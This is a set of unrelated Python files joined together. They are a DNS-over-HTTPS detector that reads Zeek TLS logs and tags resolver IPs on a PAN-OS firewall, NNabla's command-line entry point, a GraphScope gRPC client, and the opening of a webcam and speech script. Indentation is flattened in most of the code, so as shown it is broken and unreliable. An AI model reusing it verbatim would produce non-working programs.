CACHE_AGEOUT = int(general.get('CACHE_AGEOUT'))
REFERENCE_DOMAIN = general.get('REFERENCE_DOMAIN')
ZEEK_LOG_PATH = general.get('ZEEK_LOG_PATH')
MAX_THREADS = int(general.get('MAX_THREADS'))
MAX_KEYS = int(general.get('MAX_KEYS'))
FAIL_OPEN = general.getboolean('FAIL_OPEN')
IPV4_INCLUDE = general.get('IPV4_INCLUDE')
IPV4_EXCLUDE = general.get('IPV4_EXCLUDE')
IPV6_INCLUDE = general.get('IPV6_INCLUDE')
IPV6_EXCLUDE = general.get('IPV6_EXCLUDE')
MAX_API = int(run_mode_1.get('MAX_API'))
FW_TAG = run_mode_1.get('FW_TAG')
FW_IP = run_mode_1.get('FW_IP')
API_KEY = run_mode_1.get('API_KEY')
FW_TIMEOUT = int(run_mode_1.get('FW_TIMEOUT'))
CHECK_FW_CERT = run_mode_1.getboolean('CHECK_FW_CERT')
HTTP_PORT = int(run_mode_2.get('HTTP_PORT'))
FILE_PATH = run_mode_3.get('FILE_PATH')
except Exception as e:
logging.critical('Error reading config file "config.txt": %s', e)
sys.exit(1)
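# Run modes used below: 1 tags detected DoH server IPs on a PAN-OS firewall through
# the User-ID API, 2 serves the list as plain text over HTTP (an external dynamic
# list), 3 is expected to write the list to FILE_PATH later in the script.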
cacheDict = {}
dohlist = []
dohtext = ""
lastcleaned = 0
lastcleanededl = 0
discovered = 0
textrevision = 0
prevdiscovered = 0
taggingrate = 0
prevts = time.time()
uptime_1 = time.time()
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(dohtext.encode())
def run_server():
httpd = HTTPServer(('', HTTP_PORT), SimpleHTTPRequestHandler)
logging.warning('Starting server on port %d', HTTP_PORT)
httpd.serve_forever()
def filterip(IP):
try:
address = ipaddress.ip_address(IP)
except ValueError:
logging.error('%s is not a valid IPv4/IPv6 address, skipping', IP)
return 0
if type(address) is ipaddress.IPv4Address:
for incmember in v4inclfilter:
logging.debug('%s must be in %s', address, incmember)
if address in incmember:
logging.debug('%s matches filters', IP)
for excmember in v4exclfilter:
logging.debug('%s must NOT be in %s', address, excmember)
if address in excmember:
logging.debug('%s does not match filters, skipping', IP)
return 0
else:
logging.debug('%s matches filters', IP)
return 1
logging.debug('%s does not match filters, skipping', IP)
return 0
elif type(address) is ipaddress.IPv6Address:
for incmember in v6inclfilter:
logging.debug('%s must be in %s', address, incmember)
if address in incmember:
logging.debug('%s matches filters', IP)
for excmember in v6exclfilter:
logging.debug('%s must NOT be in %s', address, excmember)
if address in excmember:
logging.debug('%s does not match filters, skipping', IP)
return 0
else:
logging.debug('%s matches filters', IP)
return 1
logging.debug('%s does not match filters, skipping', IP)
return 0
else:
logging.error('%s is not a valid IPv4/IPv6 address, skipping', IP)
return 0
def curl_debug(debug_type, debug_msg):
logging.debug('debug(%d): %s', debug_type, debug_msg)
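# check_ip probes an IP/SNI pair as a potential DoH resolver: it first sends the
# reference query in RFC 8484 wire format to https://<sni>/dns-query?dns=... and
# checks whether the last four bytes of a small response match the known address of
# REFERENCE_DOMAIN; if the response does not look like a small DNS answer it retries
# the JSON API (?name=...&type=A) and looks for that address in the body.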
def check_ip(IP, sni, query, query64, transactionid):
logging.debug('%s Attempting wire format query for IP %s using SNI %s', transactionid, IP, sni)
buffer = BytesIO()
c = pycurl.Curl()
c.setopt(pycurl.RESOLVE, ["{}:443:{}".format(sni, IP)])
c.setopt(pycurl.URL, 'https://{}/dns-query?dns={}'.format(sni, query64))
c.setopt(pycurl.HTTPHEADER, ["accept: application/dns-message"])
c.setopt(pycurl.SSL_VERIFYPEER, 0)
c.setopt(pycurl.SSL_VERIFYHOST, 0)
c.setopt(pycurl.TIMEOUT, CHECKS_TIMEOUT)
c.setopt(pycurl.WRITEDATA, buffer)
if logging.DEBUG >= logging.root.level:
c.setopt(pycurl.VERBOSE, 1)
c.setopt(pycurl.DEBUGFUNCTION, curl_debug)
try:
c.perform()
except pycurl.error:
logging.info('%s cURL had issues or timed out while checking IP %s with SNI %s using '
'wire format', transactionid, IP, sni)
return 0
if c.getinfo(pycurl.HTTP_CODE) != 200:
logging.info('%s HTTP status unsuccessful for IP %s with SNI %s using wire format, '
'HTTP_CODE %d', transactionid, IP, sni, c.getinfo(pycurl.HTTP_CODE))
body = buffer.getvalue()
logging.info('%s Received response from IP %s using SNI %s and wire format', transactionid, IP,
sni)
logging.debug('%s Response body: %s', transactionid, body)
if len(body) < 1000 and len(body) > 10:
if body[-4] == oct1 and body[-3] == oct2 and body[-2] == oct3 and body[-1] == oct4:
logging.warning('%s Found a wire format DoH server at IP %s with SNI %s', transactionid,
IP, sni)
return 1
else:
logging.debug('%s No match for wire format response, last 4 bytes are %s %s %s %s, '
'expected %s %s %s %s', transactionid, body[-4], body[-3], body[-2],
body[-1], oct1, oct2, oct3, oct4)
else:
logging.debug('%s Attempting JSON query for IP %s using SNI %s', transactionid, IP, sni)
buffer = BytesIO()
c.setopt(pycurl.URL, 'https://{}/dns-query?name={}&type=A'.format(sni, query))
c.setopt(pycurl.HTTPHEADER, ["accept: application/dns-json"])
c.setopt(pycurl.WRITEDATA, buffer)
try:
c.perform()
except pycurl.error:
logging.info('%s cURL had issues or timed out while contacting IP %s with SNI %s '
'using JSON', transactionid, IP, sni)
return 0
        if c.getinfo(pycurl.HTTP_CODE) != 200:
            logging.info('%s HTTP status unsuccessful for IP %s with SNI %s using JSON, HTTP_CODE %d',
                         transactionid, IP, sni, c.getinfo(pycurl.HTTP_CODE))
c.close()
body = buffer.getvalue()
logging.info('%s Received response from IP %s using SNI %s and JSON', transactionid, IP,
sni)
logging.debug('%s Response body: %s', transactionid, body)
if len(body) < 1000 and len(body) > 10 and exampleip in str(body):
logging.warning('%s Found a JSON DoH server at IP %s with SNI %s', transactionid, IP,
sni)
return 1
else:
logging.info('%s Tried both methods and did not detect for IP %s using SNI %s',
transactionid, IP, sni)
return 0
def check_cache(IP, sni):
try:
for lists in cacheDict[IP]:
if sni == lists[0]:
return 1
logging.debug('IP %s with SNI %s not found in cache', IP, sni)
return 0
except KeyError:
logging.debug('IP %s not found in cache for any SNI', IP)
return 0
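# The cache maps IP -> list of [sni, timestamp] pairs so each IP/SNI combination is
# probed at most once per CACHE_AGEOUT window; age_out_cache prunes expired entries.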
def write_cache(IP, sni, transactionid):
if len(cacheDict) > MAX_KEYS:
logging.critical('%s Cache full, cannot cache IP %s', transactionid, IP)
return 0
try:
cacheDict[IP].append([sni, time.time()])
except KeyError:
logging.debug('%s Key %s not present, adding it', transactionid, IP)
cacheDict[IP] = [[sni, time.time()]]
def age_out_cache():
ts = time.time()
keystorm = []
subvaltorm = []
for IP, sni_list in cacheDict.items():
for sublist in sni_list:
logging.debug('Cache entry %s %s age is %s seconds', IP, sublist[0], ts - sublist[1])
if ts - sublist[1] > CACHE_AGEOUT:
subvaltorm.append([IP, sublist])
for sublist in subvaltorm:
logging.debug('removing %s from entry %s in cache', sublist[1], sublist[0])
cacheDict[sublist[0]].remove(sublist[1])
for IP, sni_list in cacheDict.items():
if not sni_list:
keystorm += [IP]
for IP in keystorm:
logging.debug('removing key %s from cache', IP)
del cacheDict[IP]
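# tag_ip registers the IP with FW_TAG on the firewall via the PAN-OS User-ID XML API
# (type=user-id), using MAX_API as a rough ceiling on tags sent per second.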
def tag_ip(IP, timeout, tag, fw_ip, api_key, transactionid):
global taggingrate
global MAX_API
if taggingrate > MAX_API:
logging.error('%s Tagging rate is over the configured limit ( %d vs %d ). Retrying tag '
'in 2 seconds', transactionid, taggingrate, MAX_API)
time.sleep(2 + random.random())
if taggingrate > MAX_API:
logging.critical('%s Not tagging IP %s on firewall, tagging rate is %d which is above '
'the configured max %d', transactionid, IP, taggingrate, MAX_API)
return 0
xml = ('<uid-message><type>update</type><payload><register><entry ip="{}" persistent="0"><tag>'
'<member timeout="{}">{}</member></tag></entry></register></payload>'
'</uid-message>'.format(IP, timeout, tag))
buffer = BytesIO()
c = pycurl.Curl()
try:
if type(ipaddress.ip_address(IP)) is ipaddress.IPv4Address:
c.setopt(pycurl.URL, 'https://{}/api/?type=user-id&key={}'.format(fw_ip, api_key))
else:
# IPv6
c.setopt(pycurl.URL, 'https://[{}]/api/?type=user-id&key={}'.format(fw_ip, api_key))
except ValueError:
# FQDN
c.setopt(pycurl.URL, 'https://{}/api/?type=user-id&key={}'.format(fw_ip, api_key))
c.setopt(pycurl.POSTFIELDS, "cmd={}".format(xml))
c.setopt(pycurl.SSL_VERIFYPEER, CHECK_FW_CERT)
c.setopt(pycurl.SSL_VERIFYHOST, CHECK_FW_CERT)
c.setopt(pycurl.TIMEOUT, FW_TIMEOUT)
c.setopt(pycurl.WRITEDATA, buffer)
if logging.DEBUG >= logging.root.level:
c.setopt(pycurl.VERBOSE, 1)
c.setopt(pycurl.DEBUGFUNCTION, curl_debug)
try:
c.perform()
except pycurl.error:
logging.error('%s cURL had issues or timed out while trying to contact the firewall'
' at %s to tag IP %s', transactionid, fw_ip, IP)
return 0
body = buffer.getvalue()
logging.info('%s Received response from firewall at %s tagging IP %s', transactionid, fw_ip, IP)
logging.debug('%s Response body: %s', transactionid, body)
if c.getinfo(pycurl.HTTP_CODE) == 200:
return 1
else:
logging.critical('%s Tagging IP %s on firewall %s failed with HTTP code %s', transactionid,
IP, fw_ip, c.getinfo(pycurl.RESPONSE_CODE))
return 0
def thread_func(ip, sni, reference_domain, ref_domain_base64, tag_lifetime, fw_tag, fw_ip, api_key):
global discovered
global dohlist
found = 0
transactionid = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))
if check_ip(ip, sni, reference_domain, ref_domain_base64, transactionid):
logging.warning('%s Found DoH server at %s with SNI %s', transactionid, ip, sni)
discovered += 1
if RUN_MODE == 1:
# Notify firewall
if tag_ip(ip, tag_lifetime, fw_tag, fw_ip, api_key, transactionid):
logging.warning('%s Successfully tagged IP %s on firewall %s with tag %s',
transactionid, ip, fw_ip, fw_tag)
else:
logging.critical('%s Failed to tag IP %s on firewall %s', transactionid, ip, fw_ip)
else:
for sublist in dohlist:
if ip == sublist[0]:
# Update timestamp
sublist[1] = time.time()
found = 1
break
if not found:
dohlist.append([ip, time.time()])
if RUN_MODE == 2:
logging.warning('%s Updating dynamic list with IP %s on next refresh',
transactionid, ip)
if RUN_MODE == 3:
logging.warning('%s Updating file list with IP %s on next refresh', transactionid,
ip)
if check_cache(ip, sni):
logging.debug('IP %s with SNI %s found in cache after rechecking', ip, sni)
else:
logging.debug('%s Adding IP %s with SNI %s to cache', transactionid, ip, sni)
write_cache(ip, sni, transactionid)
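# text_refresh rebuilds the plain-text list served by the HTTP handler in run mode 2;
# age_out_list drops entries older than TAG_LIFETIME from that list.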
def text_refresh():
global textrevision
global dohtext
dohtext = ""
dohtext += "#REVISION {}\n".format(textrevision)
dohtext += "#TOTAL DoH FOUND: {}\n".format(len(dohlist))
dohtext += "#TOTAL IPs IN CACHE: {}\n".format(len(cacheDict))
dohtext += "#RUNNING TIME: {} SECONDS\n\n".format(time.time() - uptime_1)
for lists in dohlist:
dohtext += lists[0]
dohtext += "\n"
textrevision += 1
def age_out_list():
global dohlist
listtorm = []
for lists in dohlist:
if time.time() - lists[1] > TAG_LIFETIME and TAG_LIFETIME > 0:
listtorm += [lists]
for lists in listtorm:
dohlist.remove(lists)
def tag_rate_checker():
global taggingrate
global discovered
global prevdiscovered
global prevts
while True:
time.sleep(1)
taggingrate = (discovered - prevdiscovered) / (time.time() - prevts)
prevdiscovered = discovered
prevts = time.time()
logging.debug('Script is sending %s tags per second to the firewall', taggingrate)
logging.warning('Make sure you edit config.txt with your preferred settings.')
logging.warning('Run mode is %d', RUN_MODE)
time.sleep(5)
if TAG_LIFETIME > 2592000 or TAG_LIFETIME < 0:
logging.critical('The maximum value for TAG_LIFETIME is 2592000 and the minimum is '
'0 (unlimited). Please configure a compatible value and run the script again.')
sys.exit(1)
if RUN_MODE not in (1, 2, 3):
logging.critical('RUN_MODE must be either 1, 2 or 3.')
sys.exit(1)
if RUN_MODE == 1 and (API_KEY == "" or FW_IP == ""):
logging.critical('Please configure a valid firewall IP and API key.')
sys.exit(1)
if not os.path.isfile(ZEEK_LOG_PATH):
logging.critical('File %s not found', ZEEK_LOG_PATH)
sys.exit(1)
# Check filters
v4inclfilter = []
if IPV4_INCLUDE == "":
IPV4_INCLUDE = "0.0.0.0/0"
for member in IPV4_INCLUDE.split(','):
try:
addr = ipaddress.ip_network(member)
if type(addr) is ipaddress.IPv4Network and addr != "":
v4inclfilter += [ipaddress.ip_network(member)]
else:
logging.critical('Invalid IPv4 include filter provided, %s. Exiting', member)
sys.exit(1)
except SystemExit:
sys.exit(1)
except ValueError:
logging.critical('Invalid IPv4 include filter provided, %s. Exiting', member)
sys.exit(1)
v4exclfilter = []
if IPV4_EXCLUDE != "":
for member in IPV4_EXCLUDE.split(','):
try:
addr = ipaddress.ip_network(member)
if type(addr) is ipaddress.IPv4Network and addr != "":
v4exclfilter += [ipaddress.ip_network(member)]
else:
logging.critical('Invalid IPv4 exclude filter provided, %s. Exiting', member)
sys.exit(1)
except SystemExit:
sys.exit(1)
except ValueError:
logging.critical('Invalid IPv4 exclude filter provided, %s. Exiting', member)
sys.exit(1)
v6inclfilter = []
if IPV6_INCLUDE == "":
IPV6_INCLUDE = "::/0"
for member in IPV6_INCLUDE.split(','):
try:
addr = ipaddress.ip_network(member)
if type(addr) is ipaddress.IPv6Network and addr != "":
v6inclfilter += [ipaddress.ip_network(member)]
else:
logging.critical('Invalid IPv6 include filter provided, %s. Exiting', member)
sys.exit(1)
except SystemExit:
sys.exit(1)
except ValueError:
logging.critical('Invalid IPv6 include filter provided, %s. Exiting', member)
sys.exit(1)
v6exclfilter = []
if IPV6_EXCLUDE != "":
for member in IPV6_EXCLUDE.split(','):
try:
addr = ipaddress.ip_network(member)
if type(addr) is ipaddress.IPv6Network and addr != "":
v6exclfilter += [ipaddress.ip_network(member)]
else:
logging.critical('Invalid IPv6 exclude filter provided, %s. Exiting', member)
sys.exit(1)
except SystemExit:
sys.exit(1)
except ValueError:
logging.critical('Invalid IPv6 exclude filter provided, %s. Exiting', member)
sys.exit(1)
# Start HTTP server
if RUN_MODE == 2:
thread = Thread(target=run_server, args=())
thread.daemon = True
thread.start()
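# Build the reference DNS query in wire format: abcd is the transaction ID, 0100 sets
# the RD flag, QDCOUNT is 1, and the QNAME is length-prefixed labels (e.g.
# "example.com" becomes 07 "example" 03 "com" 00), followed by QTYPE A and QCLASS IN.
# The result is base64url-encoded without padding as required by RFC 8484.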
# Domain name to wire format
labels = b""
for part in REFERENCE_DOMAIN.split('.'):
label = part.encode('ascii')
length = len(label).to_bytes(1, 'big')
labels += (length + label)
reference_domain_hex = labels.hex()
hex_string = "abcd01000001000000000000{}0000010001".format(reference_domain_hex)
hex_bytes = bytes.fromhex(hex_string)
reference_domain_base64 = base64.urlsafe_b64encode(hex_bytes).decode("utf-8")
reference_domain_base64 = reference_domain_base64.replace("=", "")
if RUN_MODE == 1:
thread = Thread(target=tag_rate_checker, args=())
thread.start()
logging.warning('Entering scan loop')
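# Main loop: resolve REFERENCE_DOMAIN (its A record is what check_ip compares
# against), wait for the Zeek ssl.log to exist, then parse it for established TLS
# sessions to port 443 and spawn a checker thread for every IP/SNI pair that is not
# already cached, throttled by MAX_THREADS.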
while True:
logging.info('Commencing scan')
threadlist = []
toremove = []
for t in threadlist:
if not t.is_alive():
toremove += [t]
for t in toremove:
threadlist.remove(t)
logging.info('Current active threads is %d', len(threadlist))
# Resolve example.com for comparison
logging.warning('Attempting to resolve reference domain %s', REFERENCE_DOMAIN)
retries = 0
success = False
while not success:
try:
            exampleip = [str(i[4][0]) for i in socket.getaddrinfo(REFERENCE_DOMAIN, 80, socket.AF_INET)]
success = True
except Exception as e:
retries += 1
if retries > 10:
logging.critical('Failed to resolve reference domain %s, exiting...',
REFERENCE_DOMAIN)
sys.exit(1)
logging.error('Failed to resolve reference domain %s because of %s, retrying...',
REFERENCE_DOMAIN, e)
time.sleep(10)
exampleip = exampleip[0]
exampleip_split = exampleip.split(".", 3)
oct1 = int(exampleip_split[0])
oct2 = int(exampleip_split[1])
oct3 = int(exampleip_split[2])
oct4 = int(exampleip_split[3])
logging.warning('Domain %s resolves to %s', REFERENCE_DOMAIN, exampleip)
timerolled = time.time()
while not os.path.isfile(ZEEK_LOG_PATH):
        if time.time() - timerolled > 3600:
logging.critical('Log file at %s not present for over 1 hour. Exiting script.',
ZEEK_LOG_PATH)
sys.exit(1)
logging.warning('Log file at %s currently does not exist, probably rolled by Zeek. Checking'
' again in 10 seconds...', ZEEK_LOG_PATH)
time.sleep(10)
# Parse ssl.log
logging.warning('Parsing file %s', ZEEK_LOG_PATH)
for log_record in ParseZeekLogs(ZEEK_LOG_PATH, output_format="json", safe_headers=False,
fields=["id.resp_h", "id.resp_p", "server_name", "resumed",
"established"]):
if log_record is not None:
log_record_json = json.loads(log_record)
logging.debug('Parsing log record %s', log_record_json)
if not filterip(log_record_json["id.resp_h"]):
continue
# Look for fully established HTTPS connections
logging.debug('Destination port is %s and established value is %s',
log_record_json["id.resp_p"], log_record_json["established"])
if log_record_json["id.resp_p"] == 443 and log_record_json["established"] is True:
logging.debug('Log record compatible, scanning it')
# Don't send SNI if not available, check IP and cache it
if log_record_json["server_name"] == "-" or log_record_json["server_name"] == "":
logging.info('Log record %s has no SNI information, using raw IP instead',
log_record_json["id.resp_h"])
if not check_cache(log_record_json["id.resp_h"], log_record_json["id.resp_h"]):
if len(cacheDict) > MAX_KEYS and FAIL_OPEN is True:
logging.error('FAIL_OPEN is set to True and cache is full, not scanning'
' IP %s with SNI %s', log_record_json["id.resp_h"],
log_record_json["id.resp_h"])
continue
logging.info('IP %s with SNI %s not in cache, checking it',
log_record_json["id.resp_h"], log_record_json["id.resp_h"])
thread = Thread(target=thread_func, args=(log_record_json["id.resp_h"],
log_record_json["id.resp_h"], REFERENCE_DOMAIN,
reference_domain_base64, TAG_LIFETIME, FW_TAG, FW_IP,
API_KEY))
thread.start()
threadlist.append(thread)
else:
logging.debug('IP %s with SNI %s is already in cache, scan aborted',
log_record_json["id.resp_h"], log_record_json["id.resp_h"])
else:
# Check IP and cache it
if not check_cache(log_record_json["id.resp_h"],
log_record_json["server_name"]):
if len(cacheDict) > MAX_KEYS and FAIL_OPEN is True:
logging.error('FAIL_OPEN is set to True and cache is full, not scanning'
' IP %s with SNI %s', log_record_json["id.resp_h"],
log_record_json["server_name"])
continue
logging.info('IP %s with SNI %s not in cache, checking it',
log_record_json["id.resp_h"], log_record_json["server_name"])
thread = Thread(target=thread_func, args=(log_record_json["id.resp_h"],
log_record_json["server_name"], REFERENCE_DOMAIN,
reference_domain_base64, TAG_LIFETIME, FW_TAG, FW_IP,
API_KEY))
thread.start()
threadlist.append(thread)
else:
logging.debug('IP %s with SNI %s is already in cache, scan aborted',
log_record_json["id.resp_h"], log_record_json["server_name"])
while len(threadlist) > MAX_THREADS:
logging.debug('MAX_THREADS value reached, waiting')
toremove = []
for t in threadlist:
if not t.is_alive():
toremove += [t]
for t in toremove:
threadlist.remove(t)
logging.info('Current active threads is %d', len(threadlist))
logging.warning('Waiting 60 seconds before cache clean')
time.sleep(60)
# Age out cache and list
logging.warning('Cleaning stale cache entries')
age_out_cache()
if RUN_MODE in (2, 3):
logging.warning('Cleaning stale list entries')
age_out_list()
# Refresh EDL text string
logging.warning('Refreshing external lists')
text_refresh()
# Write to file
if RUN_MODE == 3:
with open(FILE_PATH, "w") as text_file:
print(dohtext, file=text_file)
logging.warning('Current entries in cache: %s unique IPs, maximum limit is %s', len(cacheDict),
MAX_KEYS)
logging.warning('Total DoH servers discovered: %d', len(dohlist))
logging.warning('Waiting 60 seconds before next scan')
time.sleep(60)
|
cli.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
def _nnabla_version():
import nnabla
return 'Version {}'.format(nnabla.__version__) + \
', ' + \
'Build {}'.format(nnabla.__build_number__)
def version_command(args):
print(_nnabla_version())
return_value = None
def main():
global return_value
import six.moves._thread as thread
import threading
thread.stack_size(128 * 1024 * 1024)
sys.setrecursionlimit(0x3fffffff)
main_thread = threading.Thread(target=cli_main)
main_thread.start()
main_thread.join()
if not return_value:
sys.exit(-1)
def cli_main():
global return_value
return_value = False
import nnabla
parser = argparse.ArgumentParser(description='Command line interface ' +
'for NNabla({})'.format(_nnabla_version()))
parser.add_argument(
'-m', '--mpi', help='exec with mpi.', action='store_true')
subparsers = parser.add_subparsers()
from nnabla.utils.cli.train import add_train_command
add_train_command(subparsers)
from nnabla.utils.cli.forward import add_infer_command, add_forward_command
add_infer_command(subparsers)
add_forward_command(subparsers)
from nnabla.utils.cli.encode_decode_param import add_decode_param_command, add_encode_param_command
add_encode_param_command(subparsers)
add_decode_param_command(subparsers)
from nnabla.utils.cli.profile import add_profile_command
add_profile_command(subparsers)
from nnabla.utils.cli.conv_dataset import add_conv_dataset_command
add_conv_dataset_command(subparsers)
from nnabla.utils.cli.compare_with_cpu import add_compare_with_cpu_command
add_compare_with_cpu_command(subparsers)
from nnabla.utils.cli.create_image_classification_dataset import add_create_image_classification_dataset_command
add_create_image_classification_dataset_command(subparsers)
from nnabla.utils.cli.uploader import add_upload_command
add_upload_command(subparsers)
from nnabla.utils.cli.uploader import add_create_tar_command
add_create_tar_command(subparsers)
from nnabla.utils.cli.convert import add_convert_command
add_convert_command(subparsers)
# Version
subparser = subparsers.add_parser(
'version', help='Print version and build number.')
subparser.set_defaults(func=version_command)
print('NNabla command line interface (Version {}, Build {})'.format(
nnabla.__version__, nnabla.__build_number__))
args = parser.parse_args()
if 'func' not in args:
parser.print_help(sys.stderr)
return
if args.mpi:
from nnabla.utils.communicator_util import create_communicator
comm = create_communicator()
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
comm.abort()
else:
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
return_value = False
if __name__ == '__main__':
main()
|
rpc.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import json
import logging
import pickle
import sys
import threading
import time
import grpc
from graphscope.framework.errors import ConnectionError
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import GRPCError
from graphscope.proto import coordinator_service_pb2_grpc
from graphscope.proto import error_codes_pb2
from graphscope.proto import message_pb2
from graphscope.version import __version__
logger = logging.getLogger("graphscope")
def catch_grpc_error(fn):
"""Print error info from a :class:`grpc.RpcError`."""
@functools.wraps(fn)
def with_grpc_catch(*args, **kwargs):
try:
return fn(*args, **kwargs)
except grpc.RpcError as exc:
if grpc.StatusCode.INTERNAL == exc.code():
raise GRPCError("Internal Error: " + exc.details()) from None
elif (
grpc.StatusCode.UNKNOWN == exc.code()
or grpc.StatusCode.UNAVAILABLE == exc.code()
):
logger.error(
"rpc %s: failed with error code %s, details: %s"
% (fn.__name__, exc.code(), exc.details())
)
                raise FatalError("The analytical engine server may be down.") from None
else:
raise GRPCError(
"rpc %s failed: status %s" % (str(fn.__name__), exc)
) from None
return with_grpc_catch
def suppress_grpc_error(fn):
"""Suppress the GRPC error."""
@functools.wraps(fn)
def with_grpc_catch(*args, **kwargs):
try:
return fn(*args, **kwargs)
except grpc.RpcError as exc:
if isinstance(exc, grpc.Call):
logger.warning(
"Grpc call '%s' failed: %s: %s",
fn.__name__,
exc.code(),
exc.details(),
)
except Exception as exc: # noqa: F841
logger.warning("RPC call failed: %s", exc)
return with_grpc_catch
class GRPCClient(object):
def __init__(self, launcher, reconnect=False):
"""Connect to GRAPE engine at the given :code:`endpoint`."""
# create the gRPC stub
options = [
("grpc.max_send_message_length", 2147483647),
("grpc.max_receive_message_length", 2147483647),
("grpc.max_metadata_size", 2147483647),
]
self._launcher = launcher
self._channel = grpc.insecure_channel(
launcher.coordinator_endpoint, options=options
)
self._stub = coordinator_service_pb2_grpc.CoordinatorServiceStub(self._channel)
self._session_id = None
self._logs_fetching_thread = None
self._reconnect = reconnect
def waiting_service_ready(self, timeout_seconds=60):
begin_time = time.time()
request = message_pb2.HeartBeatRequest()
while True:
code = self._launcher.poll()
if code is not None and code != 0:
raise RuntimeError(f"Start coordinator failed with exit code {code}")
try:
self._stub.HeartBeat(request)
logger.info("GraphScope coordinator service connected.")
break
except grpc.RpcError as e:
# Cannot connect to coordinator for a short time is expected
# as the coordinator takes some time to launch
msg = f"code: {e.code().name}, details: {e.details()}"
if e.code() == grpc.StatusCode.DEADLINE_EXCEEDED:
logger.warning("Heart beat analytical engine failed, %s", msg)
else:
logger.warning("Heart beat coordinator failed, %s", msg)
if time.time() - begin_time >= timeout_seconds:
                    raise ConnectionError(
                        "Connect coordinator timeout, coordinator code: %s, details: %s"
                        % (e.code().name, e.details())
                    )
time.sleep(1)
def connect(self, cleanup_instance=True, dangling_timeout_seconds=60):
return self._connect_session_impl(
cleanup_instance=cleanup_instance,
dangling_timeout_seconds=dangling_timeout_seconds,
)
@property
def session_id(self):
return self._session_id
def __str__(self):
return "%s" % self._session_id
def __repr__(self):
return str(self)
def run(self, dag_def):
return self._run_step_impl(dag_def)
def fetch_logs(self):
if self._logs_fetching_thread is None:
self._logs_fetching_thread = threading.Thread(
target=self._fetch_logs_impl, args=()
)
self._logs_fetching_thread.daemon = True
self._logs_fetching_thread.start()
def close(self):
if self._session_id:
self._close_session_impl()
self._session_id = None
if self._logs_fetching_thread:
self._logs_fetching_thread.join(timeout=5)
@catch_grpc_error
def send_heartbeat(self):
request = message_pb2.HeartBeatRequest()
return self._stub.HeartBeat(request)
# @catch_grpc_error
def _connect_session_impl(self, cleanup_instance=True, dangling_timeout_seconds=60):
"""
Args:
cleanup_instance (bool, optional): If True, also delete graphscope
instance (such as pod) in closing process.
dangling_timeout_seconds (int, optional): After seconds of client
disconnect, coordinator will kill this graphscope instance.
Disable dangling check by setting -1.
"""
request = message_pb2.ConnectSessionRequest(
cleanup_instance=cleanup_instance,
dangling_timeout_seconds=dangling_timeout_seconds,
version=__version__,
reconnect=self._reconnect,
)
response = self._stub.ConnectSession(request)
self._session_id = response.session_id
return (
response.session_id,
response.cluster_type,
json.loads(response.engine_config),
response.pod_name_list,
response.num_workers,
response.namespace,
)
@suppress_grpc_error
def _fetch_logs_impl(self):
request = message_pb2.FetchLogsRequest(session_id=self._session_id)
responses = self._stub.FetchLogs(request)
for resp in responses:
info = resp.info_message.rstrip()
if info:
logger.info(info, extra={"simple": True})
error = resp.error_message.rstrip()
if error:
logger.error(error, extra={"simple": True})
@catch_grpc_error
def _close_session_impl(self):
request = message_pb2.CloseSessionRequest(session_id=self._session_id)
response = self._stub.CloseSession(request)
return response
@catch_grpc_error
def _run_step_impl(self, dag_def):
request = message_pb2.RunStepRequest(
session_id=self._session_id, dag_def=dag_def
)
response = self._stub.RunStep(request)
if response.code != error_codes_pb2.OK:
logger.error(
"Runstep failed with code: %s, message: %s",
error_codes_pb2.Code.Name(response.code),
response.error_msg,
)
if response.full_exception:
raise pickle.loads(response.full_exception)
return response
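# Minimal usage sketch for GRPCClient (illustrative only). It assumes a launcher
# object exposing a `coordinator_endpoint` attribute and a `poll()` method, which
# is what GRPCClient reads above; the LocalLauncher name and endpoint are made up.
def _example_usage():
    class LocalLauncher(object):
        coordinator_endpoint = "localhost:63800"  # assumed address of a running coordinator

        def poll(self):
            # Return None while the coordinator process is still alive.
            return None

    client = GRPCClient(LocalLauncher())
    client.waiting_service_ready(timeout_seconds=60)
    session_id, cluster_type, engine_config, pods, num_workers, namespace = client.connect()
    try:
        client.fetch_logs()
        # A dag_def protobuf built elsewhere would be executed with client.run(dag_def).
    finally:
        client.close()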
|
vcam.py
|
import cv2
import pyvirtualcam # For making virtual camera
from pyvirtualcam import PixelFormat
import numpy as np
import mediapipe as mp # Face Mesh
import multiprocessing # Enables python to run 2 processes at same time
import time
import speech_recognition as sr # Speech Recognizer
import cvzone as cv
## This function is used to take real time microphone input from user
def takesinput():
r = sr.Recognizer()
mic = sr.Microphone(device_index=1)
#print(sr.Microphone.list_microphone_names())
text=""
with mic as source:
while True:
r.adjust_for_ambient_noise(source) # To avoid taking background noise
audio = r.listen(source)
try:
text=r.recognize_google(audio)
except:
pass
#result.value=text
print(text)
            fh = open("Utils/words.txt","w+") # Saving Text in words text file (to be retrieved later)
            fh.write(text)
            fh.seek(0)  # rewind so the text just written can be read back
            print(fh.read(),"from takesinput")
            fh.close()
def program():
print(1)
mp_drawing = mp.solutions.drawing_utils # For face mesh
mp_face_mesh = mp.solutions.face_mesh
    face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
camera_no=0
'''
try:
camera_no = int(input("Enter Camera Number : "))
except:
pass
# Set up webcam capture.
'''
vcam = cv2.VideoCapture(camera_no) # Change camera no if camera doesn't detect
